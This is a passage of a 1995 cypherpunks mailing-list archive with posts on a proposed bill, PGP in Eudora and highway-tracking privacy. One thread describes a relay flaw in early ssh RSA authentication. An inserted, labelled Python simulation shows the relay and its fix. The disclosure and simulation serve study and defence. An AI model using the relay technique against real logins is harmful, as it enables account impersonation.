  cman@communities.com (Douglas Barnes)  writes:
> Since the Anti-Electronic Racketeering Act of 1995 might as well
> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
> Tim throw in the towel already, when the bill hasn't even made it
> through committee yet.

OK, let's start some traditional politics.

Anyone know what committee has jurisdiction?

Then the next step is who is on the committee?

Then which cypherpunks are constituents of the committee members?

At least some on the list write software for a living, or run ISPs and this
could affect their livelihood. Talk economic impact, not buzzwords
like "freedom" and apple pie.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Fri, 14 Jul 95 06:35:48 PDT
To: hal9001@panix.com
Subject: Re: Eudora MacPGP Woes
Message-ID: <9507141334.AA07025@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain



|   From: "Robert A. Rosenberg" <hal9001@panix.com>
|   Subject: Re: Eudora MacPGP Woes
|   
|   At 14:40 7/8/95, Black Unicorn wrote:
|   >I have noticed that an X-Attachement: header is added, but I have no idea
|   >how to remove it without opening the Eudora outbox with teachtext or
|   >something.
|   
|   Highlight the file name on the attachments line and hit delete to remove an
|   attached file request.

I guess I'm still confused about why there's an X-Attachment: header being
added. If the file is being generated by MacPGP without using the Applescript,
you can simply open the resulting encoded file (provided it is being ascii-
armored) from within Eudora then copy and paste it into an open Compose
window. Voila. No X-Attachment: header. If you delete the file name on the
attachments line, it also removes the attachment.

Mr. Unicorn: have you had any luck with the Applescript? You might try
booting without extensions (except for Applescript) and open Eudora
off-line and keep trying. 

Hope this helps,
Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Fri, 14 Jul 95 06:51:42 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Ssh security hole?
In-Reply-To: <199507132303.CAA18383@shadows.cs.hut.fi>
Message-ID: <Pine.A32.3.91.950714094431.11806J-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Tatu Ylonen wrote:

> I think you are right in your analysis.  There is indeed a problem
> with RSA authentication.  Basically what this means is that if you log
> into a corrupt host, that host can at the same time log into another
> host with your account (by fooling you to answer to the request)
> provided that you use the same RSA identity for both hosts.

Bruce Schneier calls this the GrandMaster Problem in the Applied Crypto 
section on Zero Knowledge Authentication.

This can be skewed by requiring synchronous transmissions within a very 
small synchronized time window.


Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  

Original message follows:
_______________________________________________________________
> A workaround is to use a different identity for each host you use.
> The default identity can be specified on a per-host basis in the
> configuration file, or by -i options.
> 
> And, yes, I think the same problem might occur with client host
> authentication.  Though, there you would still have to do IP-spoofing,
> DNS spoofing or similar to get through (breaking RSA based host client
> effectively reduces RhostsRSAAuthentication to conventional .rhosts
> authentication).
> 
> The protocol will need to be changed somewhat because of this.  I'll
> think about it tomorrow and let you say your opinion about it.
> 
> Thanks!
> 
>     Tatu Ylonen <ylo@cs.hut.fi>
> 
> Date: Thu, 13 Jul 1995 13:08:15 -0700
> From: David Mazieres <mazieres@pa.dec.com>
> To: ssh-bugs@cs.hut.fi
> Cc: rtm@eecs.harvard.edu, dm@eecs.harvard.edu, tbl@eecs.harvard.edu
> Subject: Ssh security hole?
> 
> I believe there is a serious problem with the RSA authentication
> scheme used in ssh, but then again I could be misreading the proposed
> RFC.  Is the following really the case?
> 
> As I understand the protocol, here is what happens during SSH_AUTH_RSA
> authentication.
> 
> Suppose the holder of SKu, is allowed access to account U on machine B
> (which holds SKb).  Both PKu and PKb are widely known.  In addition,
> machine B has a session key, PKs, which changes every hour.  When U on
> machine A wants to log into machine B, here's what I think happens
> based on my reading of the RFC:
> 
> A -> B: A
> 
> B -> A: (PKb, PKs, COOKIE)
> 	[A flags an error if PKb is not the stored value.]
> 
> A -> B: (COOKIE, {{Kab}_PKs}_PKb)
> A -> B: {U}_Kab
> A -> B: {PKu}_Kab
> 	[B aborts if SKu is not allowed access to account U.]
> 
> B -> A: {{N}_PKu}_Kab
> 
> A -> B: {{N}_MD5}_Kab (*)
> 	[B aborts if the MD5 hash is invalid.]
> 
> B -> A: access to account U with all data encrypted by Kab.
> 
> The problem is, suppose U actually wanted to log into machine C, which
> was maintained by an untrusted person.  The person maintaining C could
> initiate a connection to B the minute U tried to log into C.  When
> given a challenge {{N}_PKu}_Kbc, C could simply give this to A as the
> challenge to respond to, and then forward the response to B.
> 
> To fix the problem, A must at the very least include B in the
> response line marked (*).  I have reason to believe (after having just
> seen a lecture on authentication), that you might even need to include
> more.  A safe bet might be (but then again I am no expert):
> 
> A -> B: {(N, A, B, Kab)}_MD5
> 
> I think similar problems arise for the other authentication methods.
> 
> Other than that, though, I am really impressed by ssh.  It's easy
> to install and easy to use.  In fact, it is even more convenient to
> use than standard rsh, because the X forwarding happens
> automatically.
> 
> Thanks for such a great package!
> 
> David
> 
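
The relay David Mazieres describes and the binding he proposes, as an added Python simulation that is not part of the original thread and is not ssh's own code. It assumes a toy RSA key for U, keeps MD5 only because the message names it, and leaves out the Kab session-layer encryption because host C terminates both sessions and sees the plaintext either way; all function names and host labels are assumptions.

```python
import hashlib
import secrets

# Toy RSA key for user U, constructed for this example (two Mersenne primes;
# far too small for real use). PKU is public, SKU is U's private exponent.
_P, _Q, _E = 2**61 - 1, 2**89 - 1, 65537
PKU = (_P * _Q, _E)
SKU = pow(_E, -1, (_P - 1) * (_Q - 1))


def server_challenge():
    """Server B picks a random N and returns (N, {N}_PKu)."""
    n_bytes = secrets.token_bytes(16)
    modulus, e = PKU
    return n_bytes, pow(int.from_bytes(n_bytes, "big"), e, modulus)


def _decrypt(ciphertext):
    """Only the holder of SKu (the user on host A) can recover N."""
    return pow(ciphertext, SKU, PKU[0]).to_bytes(16, "big")


def _digest(*fields):
    """MD5 over length-prefixed fields so field boundaries are unambiguous."""
    h = hashlib.md5()
    for field in fields:
        h.update(len(field).to_bytes(4, "big") + field)
    return h.digest()


def respond_original(ciphertext):
    """The reply marked (*) in the message: MD5 over N alone."""
    return hashlib.md5(_decrypt(ciphertext)).digest()


def respond_bound(ciphertext, client, server, session_key):
    """The proposed reply: MD5 over (N, A, B, Kab) as the client sees them."""
    return _digest(_decrypt(ciphertext), client, server, session_key)


def verify_original(n_bytes, response):
    return secrets.compare_digest(hashlib.md5(n_bytes).digest(), response)


def verify_bound(n_bytes, response, client, server, session_key):
    """Server recomputes the digest from its own view of the session."""
    expected = _digest(n_bytes, client, server, session_key)
    return secrets.compare_digest(expected, response)


def login(bound, relayed):
    """Return True if server B grants access to account U.

    relayed=False: the user on A connects straight to B.
    relayed=True:  the user on A connects to C; C opens its own session to B,
                   hands B's challenge to A and passes A's answer back to B.
    """
    k_ab = secrets.token_bytes(16)   # session key A<->B (direct case)
    k_ac = secrets.token_bytes(16)   # session key A<->C (relay case)
    k_cb = secrets.token_bytes(16)   # session key C<->B (relay case)
    n_bytes, challenge = server_challenge()   # B's challenge for account U

    if not bound:
        # The answer depends on N only, so it is valid on any session.
        return verify_original(n_bytes, respond_original(challenge))

    if not relayed:
        response = respond_bound(challenge, b"A", b"B", k_ab)
        return verify_bound(n_bytes, response, b"A", b"B", k_ab)

    # A binds its answer to the peer and key it actually has (C, k_ac);
    # B checks against the peer and key it actually has (C as client, k_cb).
    response = respond_bound(challenge, b"A", b"C", k_ac)
    return verify_bound(n_bytes, response, b"C", b"B", k_cb)


if __name__ == "__main__":
    for bound in (False, True):
        for relayed in (False, True):
            print(f"bound={bound!s:5} relayed={relayed!s:5} "
                  f"-> B accepts: {login(bound, relayed)}")
```

With the unbound reply B accepts the relayed login as readily as the direct one; with the bound reply only the direct login verifies.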




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 14 Jul 95 09:50:49 PDT
To: cypherpunks@toad.com
Subject: highway monitoring
Message-ID: <199507141649.JAA27462@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


some info on highway monitoring/tracking programs starting up..
all with major privacy implications...

------- Forwarded Message
Date: Mon, 10 Jul 1995 18:40:55 -0700
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: Intelligent Vehicle-Highway Systems   (60K bytes)

[Frank Durand is a concerned citizen in Washington State who is
campaigning to require public discussion before the state adopts a
far-reaching "intelligent vehicle-highway systems" plan.  Some of the
state's plans raise questions about privacy (among other things).  He
recently sent me the enclosed document, which he got from Peter Marshall
<rocque@seanews.akita.com> from KSER Public Affairs in Seattle.  It is
a status report on the state Department of Transportation's advanced
technology projects, and it conveys a vivid sense of how the bureaucrats
and their industry partners are thinking.  I would encourage everybody
to call up their local state (or provincial or national) Department of
Transportation or regional transportation authority, ask to speak to
the expert on IVHS (or, in most countries besides the US, "transport
informatics"), and politely ask for the current status report on that
jurisdiction's advanced transportation technology projects.  (If they
tell you it doesn't exist, they're confused or playing bureaucratic games.
Perhaps you didn't ask for it by the right name.  Persist.)  See if you
can get the report in electronic form; otherwise get it in paper form and
get someone to scan it.  The potential privacy problems with these systems
can all be solved without significant sacrifices in functionality or cost,
so far as I can tell, through suitable choices of technology -- provided
the people in charge have been sensitized to the issues and persuaded to
take the effort to do it in the right way rather than the convenient way.
This is an urgent issue -- these plans are getting set in stone throughout
most of the world RIGHT NOW.  Let me know what you come up with.  ITS
America, by the way, is the trade association of US IVHS suppliers; it is
also an advisory board to the US Department of Transportation.  I'll be
leaving for a meeting on IVHS privacy issues at ITS America on July 22nd.
If you come up with any relevant information, it would be great if you
could send it to me by then.  Or else post details on the Privacy Digest,
privacy@vortex.com.  -- Phil Agre, pagre@ucsd.edu]

Date: Thu, 29 Jun 1995 13:57:15 -0700
From: fwd@ix.netcom.com (Franklin W. Durand)
To: pagre@ucsd.edu
Subject: Washington IVHS Status Report - June 1995

[...]

P.S.  Here is a little interesting trivia (some you know) regarding 
Washington State's links to ITS America: 

* Jack Kay is Chair of ITS America's Executive Committee - JHK & Associates   
wrote "Venture Washington" for WSDOT.

* Les Jacobson is  Chair of ITS America's ATMS Technical Committee - Les 
Jacobson is in Seattle and works for WSDOT.

* Walter Zavoli of Etak is Chair of ITS America's Personal Portable Advanced 
Traveler Information Systems Technical Committee - Etak is in partnership 
with WSDOT, Metro (Seattle), IBM and Delco on the SWIFT Project (Seattle Wide 
Area Information Technology) in Seattle which received a $7 million USDOT 
grant for the project.

* Lawrence Yermack of Parsons Brinckerhoff International is Chair of ITS 
America's ETTM (Electronic Toll and Traffic Management) Technical Committee
- Parsons Brinckerhoff is one of the partners in Washington Transportation 
Partners (developers for the Evergreen Point Bridge Project in Seattle).

------------------------------------------------------------------------------


Advanced Technology Branch Status Report, June 1995

Status Report
of Active Projects
June 1995

WSDOT
Advanced Technology Branch
Washington State Transportation Center
Mail Stop 354802
1107 NE 45th Street, Suite 535
Seattle, WA  98105-4631
(206) 543-3331
Fax (206) 685-0767

ADVANCED TECHNOLOGY BRANCH 
Status Report of Active Projects
Washington State Department of Transportation
JUNE 1995
Table of Contents
HOV, TDM, and Related Projects
  Travel Time Video Test
  I-90 Lane Conversion.
  HOV Lane Evaluation and Monitoring.
  HOV Lane Evaluation and Monitoring (Phase II).
  I-5 South HOV Lane Accident Analysis
  Intercounty Carpool Profile.
  An Analysis of Factors Accounting for Successes and Failures in the
    Acceptance and Utilization of Employer-Based TDM Programs.

Incident Management Projects
  Incident Response Data Base.
  Evaluation and Application of Washington State's Incident Response Guide.
  Incident Management Training for WSDOT Personnel.
  The Use of Total Station Surveying Equipment for Accident Investigation:
    A National Perspective.

ITS Projects
  North Seattle Advanced Traffic Management System
  BusView
  Traffic Data Acquisition and Distribution (TDAD)
  Puget Sound Help Me (PuSHME) Operational Test
  A Real Time Traveler Information System for Reducing Urban Freeway
    Congestion, Expansion, Implementation, and Evaluation.
  Improved Congestion Prediction Algorithm.
  Improved Error Detection and Incident Detection Using Prediction
    Techniques and Video Imaging.
  Bellevue Smart Traveler Using Traveler Information to Reduce Downtown SOV
    Commuting.
  In-Vehicle Signing and Variable Speed Limit Demonstration.
  Seattle to Portland Inter-city IVHS Corridor Study and Communication Plan
  Portland to Boise ITS Corridor Study
  Seattle to Vancouver, B.C., and Seattle to Spokane ITS Corridor Study
  Assessment of ATIS in Washington State.
  IVHS Data and Information Structure.
  Investigation of Video Image Tracking.
  IVHS Backbone Design and Demonstration.
  Demonstration of ATIS/ATMS Data Fusion in a Regional IVHS.
  IVHS - Network and Data Fusion.
  Investigation of Automatic Vehicle Location Systems for Traveler
    Information.
  Ramp Control via Neural Network Control.
  Fuzzy Logic Ramp metering.
  SWIFT - Seattle Wide-area Information For Travelers.
  SWIFT Smart Traveler.
  NEXRAD NEXt Generation Weather RADar.
  Increasing Awareness of Transportation Options Through Riderlink.
  Community Transit Arterial System Area-Wide Priority (CT ASAP)

Additional ITS Projects
  Regional Automated Trip Planning.
  Regional Ridematch.
  Regional Ridematch Hotline.
  Regional Fare Integration Project.
  Smart Bus.

Other Projects
  Traffic Congestion Monitoring-Urban Areas.
  ENTERPRISE.
  Accident Risks Using Roadway Geometrics.
  Advanced Transportation Technology Application Policy Plan.

At the beginning of each project description, one or two names are listed 
to call for further information.  The first name is the WSDOT TRAC person 
or the Metro person.  When a second name is listed, it is usually the 
principal investigator (P.I.).  The phone numbers for each person follow:

PHONE NUMBERS

WSDOT TRAC
Pete Briglia          (206) 543-3331
Morgan Balogh         (206) 543-0078
Eldon L. Jacobson     (206) 685-3187
Bill Legg             (206) 543-3332
Larry Senn            (206) 543-6741

U.W./W.S.U.  P.I.
Earl Butterfield      (206) 685-2123
Dan Dailey            (206) 543-2493
Mark Hallenbeck       (206) 543-6261
Mark Haselkorn        (206) 543-2577
Fred Mannering        (206) 543-8935
Nancy L. Nihan        (206) 543-9639
G. Scott Rutherford   (206) 685-2481
Jan Spyridakis        (206) 685-1557
Cy Ulberg             (206) 543-0365
Deirdre Meldrum       (206) 685-7639
Tom Seliga            (206) 685-7092

King County Metro
Catherine Bradshaw    (206) 684-1770
Wayne Watanabe        (206) 684-1633
Roland Bradley        (206) 689-3490
Candace Carlson       (206) 684-1562
David Cantey          (206) 684-6794

Each of the following project descriptions includes recent changes in 
bold face type, usually at the end of each report, while previously 
reported information has been changed to unbold.


HOV, TDM, and Related Projects

* Travel Time Video Test.  (Eldon L. Jacobson) This project is
studying the use of high resolution video cameras and computer software 
that subsequently analyzes the video tapes to compute vehicle travel 
times using the matching license plate method.  WSDOT has arranged for 
Transformation Systems, Inc., of Houston, Texas to perform the work.  The 
field work will be done during June 19-22, 1995, with the analysis and 
the report received about a month later.  We will be looking at travel 
times between HOV lanes and GP lanes.

* I-90 Lane Conversion.  (Eldon L. Jacobson or Fred Mannering)
This project studied the impacts of converting a general purpose lane to 
an HOV lane on I-90 between Issaquah and Eastgate (sometimes called 
take-a-lane).  The westbound conversion (and added lane) was fully 
operational on December 6, 1993.  During January, 1994, the lane 
configuration was revised in the Mercer Slough area, creating a 
bottleneck section on westbound I-90 that has two general purpose lanes 
plus the HOV lane.  After a couple of months the complaints quieted, and 
people appear to have become used to the situation.  On June 27, 1994, 
westbound I-90 ramp metering was implemented.  Some video tape for the 
"after" data survey was collected the week before the ramp meter
turn-on.  The draft report was circulated for review late November, 
1994.  Comments have been incorporated into the final report by the P.I.  
The final report is complete and has been published.  Project complete.

* HOV Lane Evaluation and Monitoring.  (Eldon L. Jacobson or Cy
Ulberg) This project will produce the first annual (July, 1992 thru June,
1993) HOV system evaluation, on the basis of the methodology developed in 
the above project.  It is important to periodically monitor and evaluate 
existing HOV lanes in order to make decisions about the operation of 
existing HOV lanes and about the best location to construct future HOV 
lanes.  The evaluation will consider HOV lane usage, violations, safety, 
time savings, capacity improvements, modal shifts, route shifts, 
enforcement issues, cost effectiveness, and public opinion.
The project will build on existing information to construct a database 
for evaluation of HOV lanes.  Quarterly, annual, and biennial reports 
will be published.  At the end of the research, recommendations will be 
made about the type of data necessary to do an HOV lane evaluation, the 
data collection methodology, what agencies should be involved in HOV lane 
evaluations, and the timing and format of HOV evaluation reports.
Surveys for I-5 South of Seattle (the Southcenter hill area to Midway) 
were mailed out to motorists the week of February 10, 1992.  Opinion 
surveys for Metro bus drivers in the I-5 South corridor were handed out 
in late February, 1992, and returned in early March, 1992.  All surveys
have been tabulated and summarized.
Data collection is now proceeding throughout the Seattle area.  In 
addition to obtaining travel time and vehicle occupancy in the freeway 
mainline, vehicle occupancy is also being obtained at some ramps.  Ramps 
are usually easier to monitor, and should reflect occupancy changes 
sooner than the higher volumes on the mainline.
This project was supplemented to evaluate the change from a 3 person 
carpool definition to a 2 person carpool definition on I-5 north of the 
Seattle CBD.  The draft report for the 2+ demo (prepared by TRAC and TTI) 
was received on January 27, 1992.  The final report for the 2+ demo is 
now available.  Contact Eldon if you want a copy.  The results indicate 
that vehicle occupancy decreased, reliability decreased and travel time 
increased in the northbound direction, much of the driving public 
approves of 2+, and there was no evidence that the project affected 
accident rates.  The steering committee made three recommendations.  
First, the results of the demonstration project do not support existing 
policies.  Second, the 2+ should revert to 3+ after a minimum 60 day 
period.  Third, future occupancy requirement decisions should be based on 
a performance standard that measures speed and reliability.
A second supplemental project to the original project was funded.  This 
second project developed a performance standard that measures speed and 
reliability.  The intention was to have an easily measured reliability 
standard for HOV lanes, which could be used when considering revising the 
carpool definition for a particular HOV corridor.  During April and May, 
1992, data collection was done on the I-5 North corridor that was used in 
developing the standard.  A performance standard was adopted by the WSDOT 
HOV Policy Board on August 13, 1992.  It reads:  "HOV lane vehicles 
should maintain or exceed an average of 45 miles per hour or greater at 
least 90 percent of the times they use that lane during the peak hour 
(measured for a consecutive six-month period)."
Collection of data continues throughout the area during each Monday to 
Friday peak period at about 20 different sites.  The draft report was 
distributed before the end of March, 1994.  Review comments have been 
received and the report has been revised.  The final report was shipped 
to the Research Office for printing in December, 1994.  Eldon got the 
final report back to fix some page numbering problems and returned it to 
the Research Office on February 8, 1995.  Final report complete.  Project 
complete.

* HOV Lane Evaluation and Monitoring (Phase II).  (Eldon L.
Jacobson or Cy Ulberg)  This is the ongoing data collection and reporting
project.  Auto occupancy data are being collected every morning and 
evening peak period Monday through Friday.  A 486 computer with a high 
capacity hard drive has been acquired to aid in the data analysis and 
storage.  A two page legislative briefing report has been prepared.  It 
will be distributed (probably in the Ex*Press) with changes and updates 2 
or 3 times a year.  Quarterly data updates are being prepared, which will 
update one of the appendices in the final report described in the 
previous project.  The initial quarterly report is complete (this will 
actually add the 6 quarters that follow the 4 quarters in Appendix B of 
the report in the previous project).

* I-5 South HOV Lane Accident Analysis.  (Eldon L. Jacobson)
This is an in-house project to analyze the before and after accident 
information for the HOV lane termination area at the top of the 
Southcenter hill.  The accident data was provided by the Northwest 
Region.  A draft report was circulated on June 1, 1994, and review 
comments are being received.

* Intercounty Carpool Profile.  (Eldon L. Jacobson or Cy
Ulberg) This project will provide knowledge of why people choose to ride 
share.  The primary method to acquire information about a broad range of 
carpools in the two-county region (Snohomish and King counties) will rely 
on surveys of a random sample of people observed in carpools on selected 
freeways, arterials, and streets.  A large number of surveys (on the 
order of 1000) will be conducted by mail, and they may include small 
incentives to encourage a high return rate.  A follow-up survey will be 
conducted after one year.  A smaller sample will be contacted for more 
intensive personal interviewing (focus groups).  This project will be 
used to enhance the HOV 2+ evaluation.  The project match will come from 
that project in order to direct questions toward the carpool definition 
change.  We're waiting for the funds to be released by Metro to start the
project.  The funds have been released and a U.W. budget number assigned 
to the project.  An initial literature review has been done.  Carpool 
license plates have been collected and the public opinion survey is being 
finalized for printing.  The survey was printed and mailed out in June, 
1994.  Surveys have been returned and have been coded for analysis.  The 
project has been put on hold until early 1995, as the graduate student 
who is working on the project, Matt Benuska, is studying for three months 
in South Korea.

* An Analysis of Factors Accounting for Successes and Failures
in the Acceptance and Utilization of Employer-Based TDM Programs.  (Bill
Legg or Cy Ulberg) This project will carefully investigate the processes
that companies employ to implement TDM programs.  It will develop a model
of the factors that influence employees' attitudes and lead to actual
changes in commuting behavior and will be useful to employers throughout 
the state in designing and implementing successful TDM programs.  The 
project will be coordinated with the State Energy Office and to bolster 
the work currently being undertaken because of the commute trip reduction 
legislation.  The scope of work was developed in cooperation with Metro 
and the Energy Office.  A new element of the project will be the
addition of a consultant to look at a proactive program for multi-site
employers to shift personnel around so employees are working at the site 
nearest their home.  
The draft final report has been completed and has been distributed for 
review and comment.  This project has been given a $95,000 supplement for a
proximate commuting study.  This study has been initiated and a detailed 
evaluation plan is now being developed.  Proximate commuting is the 
concept of decentralizing work so that employees can work closer to their 
residence thereby reducing commuting time and distance.

Incident Management Projects

* Incident Response Data Base.  (Bill Legg or Fred Mannering)
This project will develop and establish an incident response database.  
The database will be used to evaluate incident response measures 
developed and implemented in the Seattle area.  This project was approved 
in February.  The first project meeting with the researchers and the Data 
Annex in Olympia took place the middle of March.  The Data Annex 
installed the CARS database at TRAC on May 27th.  The project team is 
working with WSDOT's 3 western regions and the East Central region to 
establish a database format Incident report that could be used as a 
standard for the entire state.  This format will be compatible with the 
State's MicroCars database.  Work is also being done on a geographical
representation of the MicroCars database by combining it with a GIS 
system.  This project's completion date was extended to 6/31/94 from 
12/31/93 to permit more testing of the database.
The draft database (the final level of effort for this project) is 
complete and now being used.  We are looking at any additional needs for 
this project beyond the current completed work. 

* Evaluation and Application of Washington State's Incident
Response Guide.  (Bill Legg or Fred Mannering) This project will
evaluate the effectiveness, appropriateness, and format of the incident 
response guide currently used by WSDOT's North West Region's incident 
response teams.  Based on this evaluation it will produce an updated 
electronic version of the guide for WSDOT's 3 western regions and the 
East Central region.  Each region will be able to customize and update the
documents as needed in the future.
The project is now complete.   

* Incident Management Training for WSDOT Personnel.  (Bill
Legg) This project, through training sessions, will
  - introduce the basic language and protocol for the Incident
    Command System to the WSDOT IRT members,
  - summarize new and existing state and federal regulations that
    impact current incident management practices,
  - identify WSDOT IRT training material suitable for periodic
    "refresher" training, and
  - provide information to Maintenance Area Supervisors on the
    importance of effective incident management.
This project began the first of the year (1995) and training will begin 
this summer.  

* The Use of Total Station Surveying Equipment for Accident
Investigation: A National Perspective.  (Bill Legg) WSDOT took the
national leadership role in the implementation of the use of total
station surveying equipment by the State Patrol as a way to more quickly
clear major accident scenes.  This project will determine
  - how the use of total station surveying equipment for accident
    investigation has expanded to other parts of the nation,
  - what factors encourage the use of the technology,
  - what factors discourage the use of the technology, and
  - how the quantified and perceived benefits change depending on
    local conditions.
The survey of national law enforcement agencies has been completed.

ITS Projects

* North Seattle Advanced Traffic Management System.  (Morgan
Balogh)  The primary objective of this project is to provide
communications to the different traffic control systems in the I-5
corridor from Seattle to Marysville.  This will enable coordinated
operations among the different jurisdictions' traffic signal systems and
the freeway ramp meter system, provide a regional monitoring and data 
sharing system, and receive real-time information on traffic and transit 
conditions.  This project will be expandable to the east and south to 
include the entire Seattle Metropolitan area.  
Many times political and jurisdictional issues prevent coordinating 
adjacent systems.  These issues will be worked out over the course of the 
project.
This project will endeavor to obtain data from several signal systems in 
the I-5/SR 99 corridor in north King County and south Snohomish County.  
The data will be collected by a separate micro-computer through 
communications links with central traffic control systems (and master 
controllers if necessary) belonging to the various jurisdictions 
involved.  The micro-computer will compile the volume, occupancy, and 
operations data and transmit it back out to the participating control 
systems.  Each signal system will independently use the data to improve 
its traffic management capabilities.  TIB funding for this project has 
been obtained.  The City of Seattle was the lead agency for obtaining TIB 
funds.  Oil rebate money is also being used on this project.  The FHWA is 
contributing 3.5 million in state appropriated IVHS money.  
Dave Berg of the WSDOT, NW Region is managing this project.  Farradyne 
System Inc., is the lead consultant on the project.  FSI started work on 
Nov. 29, 1994.  This was the same date that a kickoff meeting was held.  
FSI has just completed the Control Strategy Report for the project (June 
16, 1995).  It is currently under review.  There have been several user 
group meetings with the next scheduled for June 17, 1995.  FSI is 
currently working on the system design.

* Graphical Display of Real-Time Transit Coach Locations: Toward
an APTS for the Puget Sound Region (BusView).  (Morgan Balogh, Dan
Dailey)  The project will design and demonstrate a system that 
graphically displays real-time transit coach locations to the University 
of Washington campus community.  The system will use Seattle Metro's 
existing automatic vehicle location system as its information source.  
This is a $170,000 project sponsored by WSDOT ($100,000) and TRANSNOW
($70,000).  The completion date is February 1996.
The design of the APTS architecture and interfaces is well underway and 
the evaluation of the accuracy of the AVL data is beginning.  The system 
will be demonstrated at a Transit Conference in Spokane in late August.

* Traffic Data Acquisition and Distribution (TDAD).  (Morgan
Balogh, Dan Dailey)  The TDAD project will provide a system that will 
access available traffic databases and store it in a separate database 
for historical, research, and planning purposes.  Agencies will then be 
able to request from the system specific records, and obtain these in 
formats meaningful and useful to them.  The initial system will be 
demonstrated in the Puget Sound area, together with linkages to state 
level databases and applications.  This project is coordinated with the 
North Seattle ATMS.  This project supports regional Congestion Management 
Plans.  The total project cost is $210,000 and is fully funded by the FHWA.
UW staff has interviewed the parties that will benefit by this project.  
They include planning representatives from PSRC, TRIP, FHWA, and the 
WSDOT N.W. Region.  A working paper outlining the system desired by these 
representatives has been prepared and reviewed.  The project team is
currently working with FSI and the North Seattle ATMS project on system 
integration requirements.  

* Puget Sound Help Me (PuSHMe) Operational Test.  (Morgan
Balogh) The WSDOT has received USDOT operational test funding for a Puget 
Sound regional mayday system.  This is a public-private partnership whose 
participants include the FHWA, WSDOT, WSP, David Evans and Associates, 
Inc. (DEA), Sentinel Communications (SenCom), Motorola, IBI Group Inc., 
and the University of Washington.  Other firms involved in this project 
but not actually on contract are McCaw Cellular and Intergraph.  This 
system will allow a traveler to send a signal indicating their location 
when they need assistance directly to a traffic operations center who 
will then dispatch the appropriate units (i.e. tow truck, assistance van, 
WSP, etc.)  
The cooperative agreement between WSDOT and the FHWA was signed on August 1,
1994.  The project started February 3, 1995.  An equipment purchase
contract was signed between WSDOT and SenCom as of March 3, 1995.  An
equipment lease between WSDOT and Motorola was signed 4/4/95.  The
project Kick-Off meeting is scheduled for March 28, 1995.  The evaluation
plan is almost complete and should be sent to the PuSHMe partners for review
in late June.  Motorola has installed their GPS Reference station at the
TSMC on June 15, 1995 and plan to have their Dispatch running in mid-July.
SenCom will begin producing their mayday devices in late June.
Mayday testing should begin in late July or early August. 

* A Real Time Traveler Information System for Reducing Urban
Freeway Congestion: Expansion, Implementation, and Evaluation.  (Larry
Senn or Mark Haselkorn) This is a continuation of the earlier Real-Time 
Motorist information project.  Several enhancements will be made to the 
"Traffic Reporter" information system including expanding coverage of the 
display to include all freeways in the Seattle area and to include 
separate information on the HOV lanes.  Efforts will also be made to 
improve the quality of travel time data and the quality of electronic 
data coming from the WSDOT system.  This project will provide delivery of 
the system for use by the public and will evaluate the system under 
actual use.  
Traffic Reporter has been expanded to cover the Puget Sound area.  
Testing is being done to compare "lap top" travel time data to those 
calculated by Traffic Reporter.  Also, usability testing has been 
conducted on the expanded interface, and will continue once the system is 
on display.  Traffic Reporter can now find multiple freeway routes from a 
given origin ramp to a given destination ramp.  Added features include 
the ability to compare speed and trip time between these routes, 
including a comparison of general purpose versus HOV lanes.  
A rough draft of the final report has been turned in to TRAC for
preliminary review and should be ready to go to the Research Office 
soon.  

* Improved Congestion Prediction Algorithm.  (Improved Ramp
Control Algorithm) (Larry Senn or Nancy L. Nihan)  This project
continues the search for an improved ramp control algorithm based on
predictive techniques.  The project objectives are to: (1) evaluate the
existing data and the performance of the predictive ramp control
algorithm used to operate the WSDOT traffic systems computer in Seattle,
(2) develop improvements to the existing predictive ramp control algorithm
by looking at upstream volumes and lane occupancies and ways to improve
pattern recognition, and (3) test the new algorithms on more than one
section of freeway.
Data collection computer modeling runs have been made and contrary to the 
proposal will likely need to be conducted periodically throughout the 
project.  Preliminary analyses have been performed and strategies are 
being discussed to select the algorithm most likely to be productive.  
TSMC data is now available by modem for UW analysis.  Researchers have 
found that the flow divided by the lane occupancy (F/O) provides a better 
indicator of congestion than indicators that are currently in use.  An F/O
of 90 indicates the onset of congestion and an F/O of 70 provides an
excellent indicator of congestion.  Storage, which is currently used by
the freeway system as an indicator of congestion, does not appear to be a
very good indicator (a result also found in the neural network project).
The final report is in review.  

* Improved Error Detection and Incident Detection Using
Prediction Techniques and Video Imaging.  (Larry Senn or Nancy L. Nihan)
This project seeks to improve knowledge of the relationship of volume and 
lane occupancy to the speed of traffic as a means of (1) determining 
invalid detector data and (2) detecting incidents.  In addition the 
project will attempt to improve the ability to identify bad detector 
data.  Video imaging will be used as an independent check of the 
volume/occupancy and speed relationships.  The video imaging system will 
itself be evaluated as an incident detection tool and as a tool to obtain 
vehicle speeds.
Morgan Wong is the primary R.A. on this project.  He has written a 
program to get 20 second data from Autoscope and is modeling the data to 
improve on the existing error and incident detection algorithms.  
TSMC data is now available by modem for UW analysis.  The project team 
has been collecting additional video data for testing Autoscope.  The 
overall opinion of the researchers is that Autoscope works well enough to 
be considered in future installations.  
The draft final report and draft technical report have been submitted for 
review.  

* Bellevue Smart Traveler: Using Traveler Information to Reduce
Downtown SOV Commuting.  (Eldon L. Jacobson or Mark Haselkorn) This
project produced and tested a prototype Traveler Information Center 
designed to increase the use of transit and paratransit (carpools and 
vanpools) by downtown Bellevue office workers.  The goal was to locate in 
a downtown Bellevue office complex a prototype computer-based interactive 
